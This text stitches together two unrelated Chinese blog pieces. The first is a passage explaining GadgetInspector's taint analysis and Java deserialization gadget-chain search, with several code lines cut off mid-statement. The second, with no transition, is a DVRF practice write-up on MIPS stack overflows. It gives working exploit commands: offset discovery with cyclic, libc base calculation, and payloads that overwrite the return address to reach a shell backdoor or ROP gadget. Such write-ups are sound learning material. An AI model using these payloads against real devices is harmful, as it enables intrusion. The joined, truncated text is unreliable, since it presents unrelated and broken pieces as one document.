@Override public void visitInsn(int opcode) { switch(opcode) { case Opcodes.IRETURN://从当前方法返回int case Opcodes.FRETURN://从当前方法返回float case Opcodes.ARETURN://从当前方法返回对象引用 returnTaint.addAll(getStackTaint(0));//栈空间从内存高位到低位分配空间 break; case Opcodes.LRETURN://从当前方法返回long case Opcodes.DRETURN://从当前方法返回doub
最后对于该方法的观察结束,将污点分析结果存到了passthroughDataflow中,可以看到形成了方法与污染参数目录集合之间的映射关系:
final Map<MethodReference.Handle, Set<Integer>> passthroughDataflow = new HashMap<>(); passthroughDataflow.put(method, cv.getReturnTaint());
C.method3
与A.method1流程一样
B.method2
class B { public String method2(String param) { return new C().method3(param); }}
进入到方法内部,触发visitCode,将参数this、param放入虚拟局部变量表,并形成与参数列表索引的映射关系。
内部方法执行,ALOAD指令触发visitVarInsn,参数this、param push到污点栈。
方法内部调用C.method3,INVOKEVIRTUAL指令触发visitMethodInsn,该方法首先将C.method3参数类型提取,并判断该方法是否是静态方法,如果不是静态方法,将this(被调用方法所在类的实例对象)存入argTypes第一个,并依次存入其他参数。之后获取了方法的返回值类型的所占大小,后面进行使用:
Type[] argTypes = Type.getArgumentTypes(desc); if (opcode != Opcodes.INVOKESTATIC) { //如果执行的非静态方法,则把数组第一个元素类型设置为该实例对象的类型,类比局部变量表 Type[] extendedArgTypes = new Type[argTypes.length+1]; System.arraycopy(argTypes, 0, extendedArgTypes, 1, argTypes.length); extendedArgTypes[0] = Type.getObjectType(owner
接下来初始化argTaint,将其内部元素设置为空,argTaint大小为参数的数量。然后将污点栈中的参数依次存放进argTaint中,对于污点栈savedVariableState.stackVars来说,list从右往左为栈底到栈顶,假设方法参数列表为abc,那么从栈底到栈顶分别为a、b、c。继续将污点栈栈顶元素取出后放在argTaint的最后一个位置,以此类推,从而保证了argTaint中存放的参数索引与C.method3的参数列表的顺序相同。
final List<Set<Integer>> argTaint = new ArrayList<Set<Integer>>(argTypes.length); for (int i = 0; i < argTypes.length; i++) { argTaint.add(null); } int stackIndex = 0; for (int i = 0; i < argTypes.length; i++) { Type argType = argTypes[i]; if (argType.getSize() > 0) { //根据参数类型大小,从栈顶获取入参,参数入栈是从左到右的
接下来判断方法是否是构造器,如果是构造器的话意味着在当前调用方法(B.method2)当中会有这么一段代码:
C c = new C();
因此可以确定被调用方法(C.method3)的返回值结果受到了this(C类实例对象)的污染,那么将argTaint中的0号索引取出,即为this,并将其加入resultTaint。如果不是构造器,那么就创造一个空的HashSet来存储后面的resultTaint。
从passthroughDataflow中拿到被调用方法C.method3的参数与返回值污点分析关系,并判断污点分析关系中的参数是否在当前的argTaint中,如果在则说明被调用方法的返回值被调用者传入的参数污染,这也就是为什么要进行逆拓扑排序。
Set<Integer> passthrough = passthroughDataflow.get(new MethodReference.Handle(new ClassReference.Handle(owner), name, desc));
if (passthrough != null) {
for (Integer passthroughDataflowArg : passthrough) {
//判断是否和同一方法体内的其它方法返回值关联,有关联则添加到栈底,等待执行return时保存
resultTaint.addAll(argTaint.get(passthroughDataflowArg));
}
最后还是return,将B.method2的结果存到passthroughDataflow中
main方法
public class Main {
public String main(String args) throws IOException {
String cmd = new A().method1(args);
return new B().method2(cmd);
}
}
第一步,执行visitCode存储入参到局部变量表
第二步,执行visitVarInsn参数入栈
第三步,执行visitMethodInsn调用A.method1,A.method1被污染的返回结果,也就是参数索引会被放在栈顶
第四步,执行visitVarInsn把放在栈顶的污染参数索引,放入到本地变量表
第五步,执行visitVarInsn参数入栈
第六步,执行visitMethodInsn调用B.method2,被污染的返回结果会被放在栈顶
第七步,执行visitInsn,返回栈顶数据,缓存到passthroughDataflow,也就是main方法的污点分析结果
最后通过passthroughDiscovery.save方法保存分析数据
public static class PassThroughFactory implements DataFactory<Map.Entry<MethodReference.Handle, Set<Integer>>> {
...
@Override
public String[] serialize(Map.Entry<MethodReference.Handle, Set<Integer>> entry) {
if (entry.getValue().size() == 0) {
return null;
}
final String[] fields = new String[4];
fields[0] = entry.getKey().getClassReference().getName();
fields[1] = entry.getKey().getName();
fields[2] = entry.getKey().getDesc();
StringBuilder sb = new StringBuilder();
for (Integer arg : entry.getValue()) {
sb.append(Integer.toString(arg));
sb.append(",");
}
fields[3] = sb.toString();
return fields;
}
}
最后持久化的passthrough.dat文件的数据格式如下:
类名 方法名 方法描述 能污染返回值的参数索引1,能污染返回值的参数索引2,能污染返回值的参数索引3...
0x05 方法调用污染关联-CallGraphDiscovery
我们用这个例子进行分析:
public class Main {
private String name;
public void main(String args) throws IOException {
new A().method1(args, name);
}
}
class A {
public String method1(String param, String param2) {
return param + param2;
}
}
跟进callGraphDiscovery.discover,读取前面收集的数据,然后使用ModelGeneratorClassVisitor进行观察,visitCode观察每一个类,visitMethod观察类中的每一个方法,继续跟进ModelGeneratorMethodVisitor
@Override
public MethodVisitor visitMethod(int access, String name, String desc,
String signature, String[] exceptions) {
MethodVisitor mv = super.visitMethod(access, name, desc, signature, exceptions);
ModelGeneratorMethodVisitor modelGeneratorMethodVisitor = new ModelGeneratorMethodVisitor(classMap,
inheritanceMap, passthroughDataflow, serializableDecider, api, mv, this.name, access, name, desc, signature, exceptions);
return new JSRInlinerAdapter(modelGeneratorMethodVisitor, access, name, desc, signature, exceptions);
}
进入main方法内部,触发visitCode,main方法不是静态,将this以及参数args存入局部变量表,此处与前面不同的是会在参数索引前加一个arg前缀来进行标识:
public void visitCode() {
super.visitCode();
int localIndex = 0;
int argIndex = 0;
//使用arg前缀来表示方法入参,后续用于判断是否为目标调用方法的入参
if ((this.access & Opcodes.ACC_STATIC) == 0) {
setLocalTaint(localIndex, "arg" + argIndex);
localIndex += 1;
argIndex += 1;
}
for (Type argType : Type.getArgumentTypes(desc)) {
setLocalTaint(localIndex, "arg" + argIndex);
localIndex += argType.getSize();
argIndex += 1;
}
}
我在写到这里的时候有一点疑问,对于visitVarInsn的调用时机。我们来看如下两个例子:
// example 1
A a = new A();
a.method1(args);
//example 2
new A().method1(args);
我们先来看第一个例子,new A()的字节码指令大概如下,可以看到是没有LOAD指令的,在调用构造方法时直接消费的是操作数栈上的A对象引用:
NEW A //创建A类实例
DUP //创建对象引用
INVOKESPECIAL A.<init>()V //调用构造方法
接下来由于要把对象引用存到a中,因此会把对象引用存储到局部变量表中(假设在局部变量表2号位,局部变量表1号位存储args),即ASTORE指令,此时会触发一次visitVarInsn。那么接下来在调用a.method1(args)时需要进行两次ALOAD,首先把a的对象引用加载到操作数栈上,再把args加载到操作数栈上,从而接着触发了两次visitVarInsn
NEW A
DUP
INVOKESPECIAL A.<init>()V
ASTORE 2 // 存到局部槽 2 —> visitVarInsn(ASTORE,2)
ALOAD 2 // 再加载回来 —> visitVarInsn(ALOAD,2)
ALOAD 1 // 加载 args —> visitVarInsn(ALOAD,1)
INVOKEVIRTUAL A.method1…
继续我们看第二个例子,当构造函数执行完毕后,不需要进行ASTORE,并且再调用method1时也不需要从局部变量表中加载a的对象引用,因此最终只有加载args时才会调用一次visitVarInsn
NEW A
DUP
INVOKESPECIAL A.<init>()V
// 上一步执行完 new A(),操作数栈上已经有了 A 的实例
ALOAD 1 // 将 args(槽 1)加载到栈顶 — 触发一次 visitVarInsn(AL OAD,1)
INVOKEVIRTUAL A.method1:(Ljava/lang/String;)Ljava/lang/Strin
检测到字节码指令new,触发visitTypeInsn,会push一个空的HashSet到污点栈中:
@Override
public void visitTypeInsn(int opcode, String type) {
switch(opcode) {
case Opcodes.NEW:
push();
break;
case Opcodes.ANEWARRAY:
pop();
push();
break;
case Opcodes.CHECKCAST:
// No-op
break;
case Opcodes.INSTANCEOF:
pop();
push();
break;
default:
throw new IllegalStateException("Unsupported opcode: " + opcode);
}
字节码指令INVOKESPECIALA.<init>()V,调用A的构造器,触发visitMethodInsn,判断是否是构造器,被调用方法为构造器,将this设置为argTypes第一个参数:
Type[] argTypes = Type.getArgumentTypes(desc);
if (opcode != Opcodes.INVOKESTATIC) {
Type[] extendedArgTypes = new Type[argTypes.length+1];
System.arraycopy(argTypes, 0, extendedArgTypes, 1, argTypes.length);
extendedArgTypes[0] = Type.getObjectType(owner);
argTypes = extendedArgTypes;
}
jiee下来检测启动工具时参数是否要进行污点分析,如果不进行污点分析,则直接把调用方法以及被调用方法封装为GraphCall,加入discoveredCalls中:
if (!ConfigHelper.taintTrack) {
//不进行污点分析,全部调用关系都记录
discoveredCalls.add(new GraphCall(
new MethodReference.Handle(new ClassReference.Handle(this.owner), this.name, this.desc),
new MethodReference.Handle(new ClassReference.Handle(owner), name, desc),
0,
"",
0));
break;
}
启动污点分析后的逻辑接着往下看,会从污点栈中取出对应的参数,但我们这里由于没有进入到visitVarInsn,因此污点栈目前只有一个在visitInsn中push进去的一个空的set,这一步不会对discoverdCalls做任何事情
接着我们分析method1(args,name)的调用情况,首先需要加载args,触发visitVarInsn,ALOAD指令,将args(arg1)推入污点栈,然后调用visitMethodInsn。由于要传递的参数name是a的属性,因此需要加载this,从this中拿到name属性。触发ALOAD指令,将this(arg0)推入污点栈。此时污点栈中为如下内容:
stackVars
[{}, {"arg1"}, {"arg0"} ]
接下来需要读入实例a的name字段,检测到字节码指令GETFIELD,触发visitFieldInsn,首先在ClassReference中不断遍历,直到找到该字段,判断该字段是否是transient,如果是transient就没必要加入污点栈。如果是非transient属性,就把栈顶当前的arg0修改为arg0.name加入污点栈中
Set<String> newTaint = new HashSet<>();
if (!Boolean.TRUE.equals(isTransient)) {
for (String s : getStackTaint(0)) {
newTaint.add(s + "." + name);
}
}
super.visitFieldInsn(opcode, owner, name, desc);
//在调用方法前,都会先入栈,作为参数
setStackTaint(0, newTaint);
非静态方法,argTypes第一个为A(this),第二个为String(args),第三个为String(name),对应了污点栈上的[{},{"arg1"}, {"arg0"} ](从左到右为栈底到栈顶),for循环i从0到2,分别从污点栈中拿到了arg0.name,arg1和空set。首先对arg0.name进行拆解,最终拆解出来dotIndex为4,srcArgIndex为0,srcArgPath为name,并记录到了discoverdCalls当中。继续拆解arg1,dotindex为-1,srcArgIndexn为1,srcArgPath为null,记录到discoverdCall
int stackIndex = 0;
for (int i = 0; i < argTypes.length; i++) {
//最右边的参数,就是最后入栈,即在栈顶
int argIndex = argTypes.length-1-i;
Type type = argTypes[argIndex];
//操作数栈出栈,调用方法前,参数都已入栈
Set<String> taint = getStackTaint(stackIndex);
if (taint.size() > 0) {
for (String argSrc : taint) {
//取出出栈的参数,判断是否为当前方法的入参,arg前缀
if (!argSrc.substring(0, 3).equals("arg")) {
throw new IllegalStateException("Invalid taint arg: " + argSrc);
}
int dotIndex = argSrc.indexOf('.');
int srcArgIndex;
String srcArgPath;
if (dotIndex == -1) {
srcArgIndex = Integer.parseInt(argSrc.substring(3));
srcArgPath = null;
} else {
srcArgIndex = Integer.parseInt(argSrc.substring(3, dotIndex));
srcArgPath = argSrc.substring(dotIndex+1);
}
//记录参数流动关系
//argIndex:当前方法参数索引,srcArgIndex:对应上一级方法的参数索引
discoveredCalls.add(new GraphCall(
new MethodReference.Handle(new ClassReference.Handle(this.owner), this.name, this.desc),
new MethodReference.Handle(new ClassReference.Handle(owner), name, desc),
srcArgIndex,
srcArgPath,
argIndex));
}
}
stackIndex += type.getSize();
}
最后save保存数据,持久化后的callgraph.dat格式如下:
调用者类名 调用者方法caller 调用者方法描述 被调用者类名 被调用者方法target 被调用者方法描述 调用者方法参数索引 调用者字段名 被调用者方法参数索引
0x06 利用链入口搜索-SourceDiscovery
在一开始我们也说到了,在挖掘反序列化链的时候需要指定类型,所以此处先获得对应的sourceDiscovery,我们这里以Jackson反序列化分析
if (!Files.exists(Paths.get("sources.dat"))) {
LOGGER.info("Discovering gadget chain source methods...");
SourceDiscovery sourceDiscovery = config.getSourceDiscovery();
//查找利用链的入口(例:java原生反序列化的readObject)
sourceDiscovery.discover();
sourceDiscovery.save();
}
跟进SourceDiscovery.discover在jackson中的实现,可以发现对于Jackson反序列化来说,source需要判断方法是否是无参构造、setter和getter,只有这些方法才能作为jackson反序列化的入口:
@Override
public void discover(Map<ClassReference.Handle, ClassReference> classMap,
Map<MethodReference.Handle, MethodReference> methodMap,
InheritanceMap inheritanceMap, Map<MethodReference.Handle, Set<GraphCall>> graphCallMap) {
final JacksonSerializableDecider serializableDecider = new JacksonSerializableDecider(methodMap);
for (MethodReference.Handle method : methodMap.keySet()) {
if (skipList.contains(method.getClassReference().getName())) {
continue;
}
if (serializableDecider.apply(method.getClassReference())) {
if (method.getName().equals("<init>") && method.getDesc().equals("()V")) {
addDiscoveredSource(new Source(method, 0));
}
if (method.getName().startsWith("get") && method.getDesc().startsWith("()")) {
addDiscoveredSource(new Source(method, 0));
}
if (method.getName().startsWith("set") && method.getDesc().matches("\\(L[^;]*;\\)V")) {
addDiscoveredSource(new Source(method, 0));
}
}
}
}
最后还是将方法保存持久化为sources.dat,格式如下:
类名 方法名 方法描述 污染参数索引
0x07 gadgetChain挖掘-GadgetChainDiscovery
跟进GadgetChainDiscovery.discover,首先进行所有重写方法的扫描,在一开始我们也说了工具没有办法在运行时进行扫描,所以对于各种方法的重写我们没有办法确定到底调用的是哪个方法
Map<MethodReference.Handle, MethodReference> methodMap = DataLoader.loadMethods();
InheritanceMap inheritanceMap = InheritanceMap.load();
Map<MethodReference.Handle, Set<MethodReference.Handle>> methodImplMap = InheritanceDeriver
.getAllMethodImplementations(
inheritanceMap, methodMap);
Map<ClassReference.Handle, Set<MethodReference.Handle>> methodsByClass = InheritanceDeriver.getMethodsByClass(methodMap);
跟进InheritanceDeriver.getAllMethodImplementations,获取之前收集到的method的类,并通过之前收集到的继承关系来获取类的所有子孙类,最终形成类->子孙类的映射关系:
Map<Handle, Set<MethodReference.Handle>> methodsByClass = getMethodsByClass(methodMap);
Map<ClassReference.Handle, Set<ClassReference.Handle>> subClassMap = new HashMap<>();
for (Map.Entry<ClassReference.Handle, Set<ClassReference.Handle>> entry : inheritanceMap.entrySet()) {
for (ClassReference.Handle parent : entry.getValue()) {
if (!subClassMap.containsKey(parent)) {
Set<ClassReference.Handle> subClasses = new HashSet<>();
subClasses.add(entry.getKey());
subClassMap.put(parent, subClasses);
} else {
subClassMap.get(parent).add(entry.getKey());
}
}
}
接下来遍历所有的方法,并遍历subclasses,如果某一个subclass中存在与当前遍历的方法名和返回值一致的方法,就将其加入overridingMethods,最后整合所有重写的方法,形成方法名到重写方法之间的映射关系,由于静态方法不可重写,因此遇到静态方法直接跳过:
//遍历所有方法,根据父类->子孙类集合,找到所有的override的方法,记录下来(某个类的方法->所有的override方法)
Map<MethodReference.Handle, Set<MethodReference.Handle>> methodImplMap = new HashMap<>();
for (MethodReference method : methodMap.values()) {
// Static methods cannot be overriden
if (method.isStatic()) {
continue;
}
Set<MethodReference.Handle> overridingMethods = new HashSet<>();
Set<ClassReference.Handle> subClasses = subClassMap.get(method.getClassReference());
if (subClasses != null) {
for (ClassReference.Handle subClass : subClasses) {
// This class extends ours; see if it has a matching method
Set<MethodReference.Handle> subClassMethods = methodsByClass.get(subClass);
if (subClassMethods != null) {
for (MethodReference.Handle subClassMethod : subClassMethods) {
if (subClassMethod.getName().equals(method.getName()) && subClassMethod.getDesc().equals(method.getDesc())) {
overridingMethods.add(subClassMethod);
}
}
}
}
}
if (overridingMethods.size() > 0) {
methodImplMap.put(method.getHandle(), overridingMethods);
}
}
然后下面的一大堆逻辑就是对重写方法关系的持久化存储,最终的methodimpl.dat格式如下:
类名 方法名 方法描述
\t重写方法的类名 方法名 方法描述
\t重写方法的类名 方法名 方法描述
\t重写方法的类名 方法名 方法描述
\t重写方法的类名 方法名 方法描述
类名 方法名 方法描述
\t重写方法的类名 方法名 方法描述
\t重写方法的类名 方法名 方法描述
接下来对callgraph.dat的调用关系进行整合,对于同一个方法发起的调用,整合成caller->被调用方法集合之间的映射关系:
Map<MethodReference.Handle, Set<GraphCall>> graphCallMap = new HashMap<>();
for (GraphCall graphCall : DataLoader
.loadData(Paths.get("callgraph.dat"), new GraphCall.Factory())) {
MethodReference.Handle caller = graphCall.getCallerMethod();
if (!graphCallMap.containsKey(caller)) {
Set<GraphCall> graphCalls = new HashSet<>();
graphCalls.add(graphCall);
graphCallMap.put(caller, graphCalls);
} else {
graphCallMap.get(caller).add(graphCall);
}
}
剩下的挖掘逻辑我们用一个例子来分析:
设我们有如下方法间调用:
源:A.sources() 污染参数 0
A.sources(0) → 调用 B.load(0)
B.load(0) → 调用接口方法 C.handle(0)
C.handle(0) 在实现类 CImpl 中有实现 CImpl.handle(0)
CImpl.handle(0) → 调用 D.sink(1)(这里假设它把参数 1 污染到 sink)
D.sink(1) 是最终的 sink
对应的数据结构:
sources.dat 只包含一个 Source(A.sources, taintedArgIndex=0)
graphCallMap
A.sources → { GraphCall(callerArgIndex=0, targetMethod=B.load, targetArgIndex=0) }B.load → { GraphCall(callerArgIndex=0, targetMethod=C.handle, targetArgIndex=0) }C.handle → { GraphCall(callerArgIndex=0, targetMethod=C.handle, targetArgIndex=0) } // interfaceCImpl.handle → { GraphCall(callerArgIndex
implementationFinder.getImplementations(C.handle) → { CImpl.handle }
isSink(D.sink,1) → true
对于是否为sink点的判断逻辑如下:
private boolean isSink(MethodReference.Handle method, int argIndex, InheritanceMap inheritanceMap) { if (!customSlinks.isEmpty()) { for (CustomSlink customSlink:customSlinks) { boolean flag = false; if (customSlink.getClassName() != null) flag &= customSlink.getClassName().equals(method.getClassRef
配置参数:
maxChainLength = 10opLevel = 2taintTrack = true
1️⃣ 初始化
for each Source: srcLink = (A.sources, 0) methodsToExplore = [ [ A.sources(0) ] ] exploredMethods = { A.sources(0) }discoveredGadgets = { }
2️⃣ 第一次迭代
iteration=0 → pop first chain
chain = [ A.sources(0) ]lastLink = (A.sources,0)
长度检查:1 < maxChainLength → 通过
取出 graphCallMap.get(A.sources) → { GC1 }
GC1: (callerArgIndex=0 → targetMethod=B.load, targetArgIndex=0)
taintTrack:GC1.callerArgIndex(0) == lastLink.taintedArgIndex(0) → 通过
找实现:allImpls = getImpls(B.load) → { B.load }(普通方法)
遍历 impls:
methodImpl = B.load
newLink = (B.load,0)
去重:exploredMethods 不含 → 继续
新链:newChain = [ A.sources(0), B.load(0) ]
sink 检测:isSink(B.load,0) → false
加入队列:
methodsToExplore = [ [A.sources(0),B.load(0)] ]exploredMethods.add(B.load(0))
3️⃣ 第二次迭代
iteration=1 → pop
chain = [A.sources(0),B.load(0)]lastLink = (B.load,0)
graphCallMap.get(B.load) → { GC2 }
GC2: (callerArgIndex=0 → targetMethod=C.handle, targetArgIndex=0)
taintTrack:匹配 → 通过
impls:getImpls(C.handle) → { },fallback 父类查找也无(接口),所以按注释 “GadgetInspector bug”,跳到父类去搜,依次找到 C.handle 本身,加入。
impls 变为 → { C.handle }
for each impl:
newLink = (C.handle,0)
去重通过
newChain = [A.sources(0),B.load(0),C.handle(0)]
isSink(C.handle,0) → false
加入:
methodsToExplore = [ [A.sources(0),B.load(0),C.handle(0)] ]
exploredMethods.add(C.handle(0))
4️⃣ 第三次迭代
chain = [A.sources(0),B.load(0),C.handle(0)]
graphCallMap.get(C.handle) → { GC3 }
GC3: (callerArgIndex=0 → targetMethod=C.handle, targetArgIndex=0) // 发自实现类
taintTrack:匹配
impls:getImpls(C.handle) → { CImpl.handle }
for each:
newLink = (CImpl.handle,0)
去重通过
newChain = [A.sources(0),B.load(0),C.handle(0),CImpl.handle(0)]
isSink(CImpl.handle,0) → false
入队 & 加入 exploredMethods
5️⃣ 第四次迭代
chain = [ …, CImpl.handle(0)]
graphCallMap.get(CImpl.handle) → { GC4 }
GC4: (callerArgIndex=0 → targetMethod=D.sink, targetArgIndex=1)
taintTrack:匹配
impls:getImpls(D.sink) → { D.sink }
for each:
newLink = (D.sink,1)
去重通过
newChain = [ …, CImpl.handle(0), D.sink(1)]
isSink(D.sink,1) → true
加入 discoveredGadgets
此时 methodsToExplore 可能为空,循环结束。
接下来进行链路聚合优化
java复制编辑for (GadgetChain shortChain : methodsToExploreRepeat) {
for (GadgetChain fullChain : discoveredGadgets) {
if (shortChain.lastLink 出现在 fullChain 里) {
// 把 fullChain 从 shortChain.lastLink 之后的部分拼过来
tmpDiscoveredGadgets.add( 拼合后的链 );
}
}
}
discoveredGadgets.addAll(tmpDiscoveredGadgets);
比如如果我们因为 opLevel 限制,把某条中间链放进了 methodsToExploreRepeat 而没展开到 sink,那么这段逻辑就能 把这些中途链 自动补全到 已知的完整 Chain,得到更多发现。
MIPS栈溢出漏洞实战解析:从DVRF题目看ROP链构造
前言
最近导师要搞IOT漏洞挖掘项目,我得找找IOT学习资料,DVRF就适合IOT设备漏洞挖掘从入门到入坟....(bushi
固件分析
Squashfs系统,还是小端序,提取一下文件
有漏洞的程序在pwnable目录下
不过DVRF里面还附带有程序的源码,所以我们先看看源码,再来看二进制程序
题目
stack_bof_01
乍一看,strcpy()和system()都有,buff叠满了,细一看system()函数是固定字符串,应该不会造成命令注入漏洞,因为已经把控制参数都给写好了(什么地狱笑话),直接留了个后门,所以只剩下strcpy()这个常见的栈溢出漏洞函数,没有对输入的内容限制长度,所以有栈溢出。buf一共200字节长度,只要argv[]这个我们可控的参数长度超过200就可以覆盖掉buf,然后劫持函数执行流到system("/bin/sh -c")这个后门函数即可
先checksec检查二进制文件信息
什么都没有,城门大开,并且是mips32位小端序,所以要模拟起来的话,需要qemu-mipsel,考虑到动态链接经常出幺蛾子,所以直接搞个静态的,即qemu-mipsel-static到固件的根目录下,
然后开启模拟
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/statck_bof_01
一开始以为显示的是缺少参数东西,检查了好久检查不出个所以然,后来才反应过来这是要在后面输入东西,然后就看见模拟成功跑起来了
那接下来我们需要得到一个偏移量,即argv[]参数到寄存器R31也就是$ra的偏移量,要么静态IDA查看计算一番,不过有可能会不准,所以直接一劳永逸用动态调试来计算好了
首先开启一个端口8888
sudo chroot . ./qemu-mipsel-static -g 8888 ./pwnable/Intro/statck_bof_01
然后另起一个窗口,开启动态调试
gdb-multiarch stack_bof_01
set architecture mips
target remote 127.0.0.1:8888
进来pwndbg初始状态
由于一开始已经在main函数里,所以直接n单步步过到strcpy函数,按理说这个流程应该没错,但是不知道是不是pwndbg自身的问题,一直报错
排查了一天也不知道怎么解决,后来网上找了一个黑盒测试的方法
主要用于 调试 MIPS 架构的缓冲区溢出漏洞
ulimit -c unlimited #启用核心转储(core dump)功能,并解除大小限制,当程序崩溃,比如说段错误时,系统会生成一个 core 文件,记录崩溃时的内存状态,如寄存器、堆栈等 此命令确保 core 文件能被完整生成
sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern' #设置核心转储文件的命名格式,方便后续调试时快速定位对应的崩溃文件
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 `cyclic 1000` #在 chroot 环境中,使用 QEMU 用户态模拟器运行 MIPS 小端序程序,并触发崩溃,程序因缓冲区溢出崩溃,生成 core 文件
sudo gdb-multiarch ./pwnable/Intro/stack_bof_01 ./qemu_stack_bof_01_20250406-074606_5214.core -q #使用支持多架构的 GDB 加载程序及其核心转储文件进行调试,查看崩溃时的寄存器状态,比如说$pc 的值,确定溢出点偏移量
cyclic -l 0x63616162 #通过崩溃时覆盖的地址,这里是0x63616162,反推溢出点偏移量 cyclic 工具生成一个 唯一递增的 4 字节模式字符串 比如说aaaabaaacaaadaaa...当程序崩溃时,若寄存器的值是 0x63616162(对应 ASCII baac,注意小端序),则执行cyclic -l 0x63616162 该值在模式字符串中的偏移量,即溢出点到返回地址的偏移
说白了,整个调试模式流程如下:
生成崩溃:通过 cyclic 字符串触发程序崩溃,生成 core 文件
定位偏移:用 cyclic -l <地址> 计算偏移量
构造 Payload:根据偏移量构造 填充数据 + 目标地址 的利用载荷
重新触发:用构造的 Payload 替换 cyclic 字符串,验证漏洞利用
学到了学到了
所以我们得到了偏移204的位置覆盖了返回地址,所以我们要先覆盖204个字节长度(这里不用再加上4个字节长度的寄存器了,因为204就已经包括了寄存器了),然后再加上程序自己留的后门函数system("/bin/sh -c")的地址,就可以完成一次攻击劫持流
由IDA可知,后门函数地址为0x00400950,并且要注意这里是小端序的写法,所以payload为
sudo chroot ./ ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 `python -c 'print(b"a"*204 + b"\x50\x09\x40\x00")'`
由于pwndbg动态调试的时候出现异常,所以这里改为用IDA进行远程动态调试
不出意外崩了,毫不意外呢....
根据技术文档分析,程序崩溃的根源与MIPS架构特性直接相关
在缓冲区溢出攻击场景中,全局指针寄存器$gp被覆盖是触发异常的核心因素。该寄存器负责维护全局数据区的基址定位,其值被破坏后,程序无法通过偏移计算正确访问全局变量或静态存储区,最终因寻址错误,比如说访问非法内存地址,导致崩溃
进一步结合漏洞利用流程,MIPS的函数执行机制要求$t9寄存器必须指向当前函数的入口地址,这是指令集中对函数跳转和数据索引的硬性规范。例如,调用dat_shell函数时,若$t9未正确指向其起始地址,代码将无法解析函数内的相对偏移,进而引发执行流紊乱
t9 寄存器总是保存的是函数的开头地址,若通过控制 ra 直接劫持到目标函数,t9 寄存器没有变化,还是原来调用过的函数的地址
所以需要调用 ROP 来设置一次 t9 寄存器的地址为后门地址,进而 jr $t9,才能使得 gp 寄存器正确的寻址
而且这里不能用 python -c 命令作为命令行参数传进去,因为在 python 输出过程中会被截断
因此,完整的利用链需分两步完成:首先通过ROP gadget精准设置$t9寄存器的值,使其符合目标函数dat_shell的入口地址,再通过控制流劫持跳转至目标函数,从而绕过MIPS架构的寄存器约束,实现稳定攻击
所以现在首要目标就是要找到一个gadgets,可以跳转到$t9寄存器,然后修改返回地址到 rop_gadget, 设置 $t9 为 dat_shell 函数的地址,跳转到 dat_shell 函数,执行system,在原程序中没有找到跳转到$t9的gadget
在DVRF固件所提供的文件libc.so.0中刚好能找到我们想要的gadget
但是这不是真正的地址,我们得去找到libc的基地址再加上0x6b20才是我们所以填写到payload中的地址
所以现在问题又变成了怎么找到libc的基地址,因为从ida来看,并没有@plt表,所以通过泄露一些在程序中已被调用的函数的地址,通过其在程序运行起来的地址减去在libc.so.0内的地址从而得到libc的基地址
那我们就用这个第一个的memset函数,在libc.so.0的地址为0001BE10
ida在memset下个断点,然后远程动态调试
找到memset在执行的时候的真正地址,为0x7F700E10
libc_base=0x7F700E10-0x0001be10=0x7f6e5000
gadget地址为=0x7f6e5000+0x6b20=0x7F6EBB20
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x20\xbb\x6e\x7f\x50\x09\x40\x00'")"
我看网上还有一种方法,因为dat_shell的首地址在0x00400950,但是直接跳过去的话又会发生崩溃,所以在0x00400950处下一个断点,看看到底咋回事
可以看到经过三次单步步过之后,gp寄存器指向了一块不知名且无法访问的内存空间
而gp寄存器在MIPS中$gp是 全局指针寄存器,用于高效访问静态数据区,比如说全局变量、常量等
程序启动时,$gp 由运行时环境,比如说启动代码设置为指向 .got或数据段中间位置。
当$gp指向了一块不知名且无法访问的内存区域时,通常意味着程序在初始化、链接或运行时逻辑中存在严重问题,也有可能时$gp 本应在程序生命周期内保持恒定,但若代码中错误地修改了 $gp,比如说如误将其用作临时寄存器),会导致后续全局数据访问失败
总之既然直接跳转到0x00400950会发生错误,那根据上述的调试可知,只要绕过前面三步单步步过就可以了,所以把payload地址修改为0x0040095c
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x5c\x09\x40\x00'")"
又get一种黑科技写法
这道题最重要的就是学到$t9寄存器的值是MIPS程序的函数的起始地址,这对rop链构造是至关重要的
stack_bof_02
先看源码
这一漏洞的本质仍属于典型的栈溢出攻击场景
程序通过命令行参数获取输入数据,在利用strcpy函数进行数据复制时,由于未对参数长度进行有效性校验,导致超出目标缓冲区的容量边界,从而引发栈空间溢出
而且,根据《揭秘家用路由器0day漏洞挖掘技术》书中所写到,main函数在MIPS架构中被归类为非叶子函数,这意味着其栈帧中会保存返回地址寄存器$ra
当溢出发生时,就可以通过构造的输入数据覆盖栈上存储的$ra值,当main函数执行完毕并尝试通过jr $ra返回时,程序流将被劫持到被篡改的地址
不过跟上一道相比,少了后门函数
因此,我们需要通过注入Shellcode到栈或寄存器中,并将$ra覆盖为Shellcode的起始地址,从而在程序返回时触发攻击代码的执行
检查一下文件,发现啥保护都没有,32小端序
模拟,启动!
sudo chroot . ./qemu-mipsel-static ./pwnable/ShellCode_Required/stack_bof_02
这已经明示了要弄shellcode了
动态调试还是不行啊...搞不定,用用黑盒测试
要覆盖508个字节长度
准备构造ROP
由于MIPS采用流水线指令集架构,其存在cache incoherency特性,因此在跳转到shellcode之前必须调用sleep等函数将数据区刷新至当前指令区,这样才能保证shellcode的正常执行
流水线指令集架构
是一种通过并行化处理指令执行过程来提高处理器效率的设计方法。其核心思想是将指令的执行过程划分为多个独立的阶段
比如说取指、译码、执行、访存、写回等
每个阶段由专门的硬件单元处理,不同阶段的指令可以同时执行,从而形成类似“工厂流水线”的工作模式
典型的流水线分为以下阶段(以经典5级流水线为例):
取指(IF):从内存中读取指令。
译码(ID):解析指令的操作码和操作数。
执行(EX):执行算术或逻辑运算。
访存(MEM):访问内存(如加载或存储数据)。
写回(WB):将结果写回寄存器。
每个阶段完成后,指令会传递到下一阶段,同时新的指令进入当前阶段。例如:
第1条指令处于写回阶段时,
第2条指令可能处于访存阶段,
第3条指令处于执行阶段,
...
举个例子
ADD R1, R2, R3 #R1 = R2 + R3,算术运算
LW R4, 0(R1) #从内存地址R1+0加载数据到R4,访存操作
SUB R5, R4, R6 # R5 = R4 - R6,依赖第2条指令的R4结果
BEQ R5, R0, LABEL #若R5 == 0,跳转到LABEL,分支指令
